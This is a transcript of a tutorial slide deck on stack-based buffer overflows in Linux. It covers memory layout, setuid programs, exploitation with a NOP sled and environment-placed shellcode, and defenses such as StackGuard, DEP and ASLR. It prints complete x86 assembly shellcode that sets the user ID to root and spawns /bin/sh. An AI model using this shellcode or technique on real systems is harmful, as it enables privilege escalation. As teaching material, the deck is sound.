Buffer Overflows : An In-depth Analysis

  • Published on
    18-Jan-2016

  • View
    51

  • Download
    0

DESCRIPTION

Buffer Overflows : An In-depth Analysis. Introduction. A buffer overflow occurs when data written to a buffer, due to insufficient bounds checking, corrupts data values in memory addresses adjacent to the allocated buffer. Buffer overflows were understood as early as 1972. - PowerPoint PPT Presentation

Transcript

Buffer Overflows : An In-depth Analysis IntroductionBuffer overflows were understood as early as 1972The legendary Morris Worm made use of a Buffer overflow exploit in fingerd in 1988Programming languages commonly associated with buffer overflows include C and C++A buffer overflow occurs when data written to a buffer, due to insufficient bounds checking, corrupts data values in memory addresses adjacent to the allocated bufferMost commonly this occurs when copying strings of characters from one buffer to another Result in erratic program behavior, including memory access errors, incorrect results, program termination , or a breach of system security.In 2003, buffer overflows present in licensed Xbox games have been exploited to allow unlicensed softwareBuffer OverflowsALICE07Name[9] Age[2] \0Who the programmer was expectingName: AliceAge : 7Buffer OverflowsFRANKSEIName[9] Age[2] TENAnd who showed up uninvitedName: FrankensteinAge : ?NIntroductionExploitationThe techniques to exploit a buffer overflow vulnerability vary per architecture, operating system and memory region Stack Based Buffer Overflows Heap Based Buffer Overflows Result in erratic program behavior, including memory access errors, incorrect results, program termination , or a breach of system security.duh!Now this is what Im talking about ! Analysis of Stack Based Buffer Overflows on LinuxFundamentals Users, Groups and the Super UserUserHerculesHerculesAthenaZeusGroupsGroup GodsHerculesOdysseusPerseusGroup MortalsFundamentals Users, Groups and the Super UserIn Unix-style computer operating systems, root is the conventional name of the user who has all rights or permissions (to all files and programs) in all modes (single- or multi-user)The root user can do many things an ordinary user cannot, such as changing the ownership of files and binding to network ports numbered below 1024.The Root UserFundamentals File Access Control and PermissionsUserGroupOthersFundamentals File Access Control and PermissionsUserGroupOthersFundamentals File Access Control and PermissionsFundamentals Suid Programssetuid and setgid are Unix access rights flags that allow users to run an executable with the permissions of the executable's owner or group.When a permission with suid permission is executed, the users effective user id (euid) is changed to the programs ownerUnix programs like mount, passwd etc. are all suid rootFundamentals Suid ProgramsFundamentals MemoryX86 processors use a 32-bit addressing scheme Variables are places in the memory that store informationPointers are special type of variables that store memory address locations to reference informationProcessor MemoryESPEBPEIPFundamentals MemoryLittle Endian and Big Endian0x78563412Little Endian Big Endian0x123456780x12345678x86, 6502, Z80, VAXMotorola 6800, 68000, System/370Fundamentals Program Memory SegmentationFundamentals The StackStack FrameFundamentals Stack FrameWhen a function is called, information is pushed to the stack and is known as a stack frameframe pointer / local base pointerstack pointerMemoryStack GrowthFundamentals Stack By ExampleSample ProgramFundamentals Stack By Example - DemoFundamentals Stack By Example - DemoFundamentals Stack By ExampleFundamentals Stack By ExampleFundamentals Stack By ExampleFundamentals Stack By ExampleEBPreturn addressreturn addressFundamentals Shellcodesection .data ; section declarationfilepath db "/bin/shXAAAABBBB" ; the stringsection .text ; section declarationglobal _start ; Default entry point for ELF linking_start:; setreuid(uid_t ruid, uid_t euid) mov eax, 70 ; put 70 into eax, since setreuid is syscall #70 mov ebx, 0 ; put 0 into ebx, to set real uid to root mov ecx, 0 ; put 0 into ecx, to set effective uid to root int 0x80 ; Call the kernel to make the system call happen; execve(const char *filename, char *const argv [], char *const envp[]) mov eax, 0 ; put 0 into eax mov ebx, filepath ; put the address of the string into ebx mov [ebx+7], al ; put the 0 from eax where the X is in the string ; ( 7 bytes offset from the beginning) mov [ebx+8], ebx ; put the address of the string from ebx where the ; AAAA is in the string ( 8 bytes offset) mov [ebx+12], eax ; put the a NULL address (4 bytes of 0) where the ; BBBB is in the string ( 12 bytes offset) mov eax, 11 ; Now put 11 into eax, since execve is syscall #11 lea ecx, [ebx+8] ; Load the address of where the AAAA was in the ; string into ecx lea edx, [ebx+12] ; Load the address of where the BBBB is in the ; string into edx int 0x80 ; Call the kernel to make the system call happenSmashing the Stack for fun and profitSmashing the Stack for fun and profitSmashing the Stack for fun and profitreturn hereRun evil code hereSmashing the Stack for fun and profitAttacker CodeReturn Address toAttacker CodeStructure of the perfect Evil InputSmashing the Stack for fun and profitAttacker CodeRepeated Return Addresses toAttacker CodeStructure of the real-world Evil InputNOP SledSmashing the Stack for fun and profitSmashing the Stack for fun and profitevil bufferWhat if the buffer was small ?Smashing the Stack for fun and profitevil bufferThou shall use the environment.environmentShellcodeSmashing the Stack for fun and profitDumping the shellcode in the environment.int execle(const char *path, const char *arg , ..., char * const envp[]); Finding the return address.return address = 0xbffffffa length of shellcode length of program nameORgdbSmashing the Stack for fun and profitDefense Choice of programming language Use of safe libraries Buffer overflow protection Address space layout randomizationThe Java and .NET bytecode environments also require bounds checking on all arraysNearly every interpreted language will protect against buffer overflows Performance Versus SafetyAvoid standard library functions which are not bounds checked (strcpy,strcat,gets)Buffer overflow protection is used to detect the most common buffer overflows by checking that the stack has not been alteredThree such systems are Libsafe, StackGuard and ProPolice gcc patchesMicrosoft's Data Execution Prevention mode explicitly protects the pointer to the SEH Exception Handler from being overwrittenAddress space layout randomization (ASLR) is a computer security feature which involves arranging the positions of key data areas, usually including the base of the executable and position of libraries, heap, and stack, randomly in a process' address space.References The Art of Exploitation - Jon Erickson Wikipedia Amal KrishnanDigital Security PracticeCognizantamalkrishnan@acm.orgamal.chemmani@cognizant.com9895937765FINSource: Wikipedia*Source: Wikipedia*Source: Wikipedia*Groups: Linux groups are a mechanism to manage a collection of computer system users. All Linux users have a user ID and a group ID and a unique numerical identification number called a userid (UID) and a groupid (GID) respectively. Groups can be assigned to logically tie users together for a common security, privilege and access purpose. It is the foundation of Linux security and access. Files and devices may be granted access based on a users ID or group ID. *Software defects which allow a user to gain root (to execute with superuser privileges code supplied by that user) are a major computer security issue, and the fixing of such software is a major part of maintaining a secure system. One common way of gaining root is to cause a buffer overflow in a program already running with superuser privileges. This is often avoided in modern operating systems by running critical services, such as httpd, under a unique limited account.*Linux is a multi-user operating system, in which full system privileges are solely invested in an administrative user called "root." In addition to the root user, there are many other user accounts and multiple groups. Many users can belong to one group, and one user can belong to many different groups. The file permissions are based on both users and groups, so that other users can't read your files unless they are explicitly given permission. Each file is associated to a user and a group, and permissions can be given out by the owner of the file. The three permissions are read, write, and execute, and they can be turned on or off in three fields: user, group, and other. File, directory and device permissions can be set to allow or deny access to members of their own group or all others. Modification of file, directory and device access is achieved with the chmod command. **setuid and setgid (short for set user ID upon execution and set group ID upon execution, respectively) are Unix access rights flags that allow users to run an executable with the permissions of the executable's owner or group. They are often used to allow users on a computer system to run programs with temporarily elevated privileges in order to perform a specific task. While the assumed user id or group id privileges provided are not always elevated, at a minimum they are specific.setuid and setgid are needed for tasks that require higher privileges than those which a common user has, such as changing his or her login password. Some of the tasks that require elevated privileges may not immediately be obvious, though such as the ping command, which must send and listen for control packets on a network interface.**In computing, a code segment, also known as a text segment or simply as text, is a phrase used to refer to a portion of memory or of an object file that contains executable instructions.It has a fixed size and is usually read-only. If the text section is not read-only, then the particular architecture allows self-modifying code. Read-only code is reentrant if it can be executed by more than one process at the same time.As a memory region, a code segment resides in the lower parts of memory or at its very bottom, in order to prevent heap and stack overflows from overwriting it.A data segment is one of the sections of a program in an object file or in memory, which contains the global variables and static variables that are initialized by the programmer. It has a fixed size, since all of the data in this section is set by the programmer before the program is loaded. However, it is not read-only, since the values of the variables can be altered at runtime. In computer programming, .bss or bss (which originally stood for Block Started by Symbol) is used by many compilers and linkers as the name of a part of the data segment containing static variables and global variables that are filled solely with zero-valued data initially (i.e., when execution begins). It is often referred to as the "bss section" or "bss segment". The program loader initializes the memory allocated for the bss section when it loads the program.*********************